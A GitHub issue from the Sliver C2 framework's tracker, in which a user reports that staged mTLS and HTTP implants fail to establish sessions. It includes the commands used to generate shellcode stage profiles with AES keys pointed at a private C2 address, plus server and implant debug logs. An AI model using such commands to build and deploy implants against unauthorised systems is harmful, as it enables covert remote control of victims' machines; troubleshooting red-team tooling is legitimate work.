mtls stage error #1903

Open
Kano-2525-a opened this issue Mar 12, 2025 · 1 comment

@Kano-2525-a

profiles new --mtls 10.211.55.2:1236 --format shellcode --arch amd64 stage
profiles stage win64_stage --aes-encrypt-key "D(G+KbPeShVmYq3t" --aes-encrypt-iv "8y/B?E(G+KbPeShV"

I wrote a program, downloaded this stage, and then ran it.

server log:
INFO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:88] Accepted incoming connection: 10.211.55.6:59742
ERRO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:191] Un-marshaling envelope error: proto: cannot parse invalid wire-format data
ERRO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:106] Socket read error proto: cannot parse invalid wire-format data

debug log:
2025/03/12 14:05:54 sliver.go:129: Hello my name is ACCURATE_CRAFTSMAN
2025/03/12 14:05:54 limits.go:58: Limit checks completed
2025/03/12 14:05:54 sliver.go:147: Running in session mode
2025/03/12 14:05:54 session.go:69: Starting interactive session connection loop ...
2025/03/12 14:05:54 transports.go:41: Starting c2 url generator () ...
2025/03/12 14:05:54 transports.go:104: Return generator: (chan *url.URL)(0xc000111140)
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:05:54 session.go:176: Connecting -> 10.211.55.2:1236
2025/03/12 14:05:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 uuid_windows.go:48: Registry host uuid value too short
2025/03/12 14:05:54 sliver.go:327: Host Uuid: 53bea3c3-8d66-41a5-a755-cccf64bf635c
2025/03/12 14:05:54 tun.go:53: [tunnel] Tunnel handlers map[20:0x2a58d780660 22:0x2a58d77f380 23:0x2a58d77e9c0 80:0x2a58d77f8a0 82:0x2a58d7815e0 125:0x2a58d782540]
2025/03/12 14:05:54 mtls.go:134: Socket error (read msg-length): EOF
2025/03/12 14:05:54 session.go:218: [mtls] eof
2025/03/12 14:05:54 session.go:159: [mtls] lost connection, cleanup...
2025/03/12 14:05:54 session.go:168: [mtls] Stop()
2025/03/12 14:05:54 sliver.go:170: Reconnect sleep: 1m0s
2025/03/12 14:06:54 session.go:176: Connecting -> 10.211.55.2:1236
2025/03/12 14:06:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:06:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:06:54 uuid_windows.go:48: Registry host uuid value too short
2025/03/12 14:06:54 sliver.go:327: Host Uuid: 53bea3c3-8d66-41a5-a755-cccf64bf635c
2025/03/12 14:06:54 tun.go:53: [tunnel] Tunnel handlers map[20:0x2a58d780660 22:0x2a58d77f380 23:0x2a58d77e9c0 80:0x2a58d77f8a0 82:0x2a58d7815e0 125:0x2a58d782540]

mtls.go:
if err != nil || n != 4 {
    mtlsLog.Errorf("Socket error (read msg-length): %v", err)
    return nil, err
}

@Kano-2525-a
Author

http stage error

37.36 (KHTML, like Gecko) Chrome/107.0.6964.521 Safari/537.36
ERRO[2025-03-13T11:20:48+08:00] [sliver/server/c2/http.go:584] Failed to decode session init

2025/03/13 11:21:48 session.go:84: Next CC = https://10.211.55.2:1236
2025/03/13 11:21:48 transports.go:92: Yield c2 uri = 'https://10.211.55.2:1236'
2025/03/13 11:21:48 session.go:172: Connecting -> http(s)://10.211.55.2:1236
2025/03/13 11:21:48 drivers_windows.go:40: Using go http driver
2025/03/13 11:21:48 httpclient.go:875: [http] segments = [authenticate auth auth authenticate], filename = register, ext = php
2025/03/13 11:21:48 httpclient.go:356: [http] POST -> https://10.211.55.2:1236/authenticate/auth/auth/authenticate/register.html?x=3110g58885751 (266 bytes)
2025/03/13 11:21:49 httpclient.go:399: [http] response decrypt failure: decryption failed
2025/03/13 11:21:49 drivers_windows.go:40: Using go http driver
2025/03/13 11:21:49 httpclient.go:875: [http] segments = [auth rest rest rest], filename = index, ext = php
2025/03/13 11:21:49 httpclient.go:356: [http] POST -> http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529 (266 bytes)
2025/03/13 11:21:49 httpclient.go:362: [http] http response error: Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 session.go:178: http(s) connection error Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 sliver.go:190: [session] failed to establish connection: Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 sliver.go:170: Reconnect sleep: 1m0s
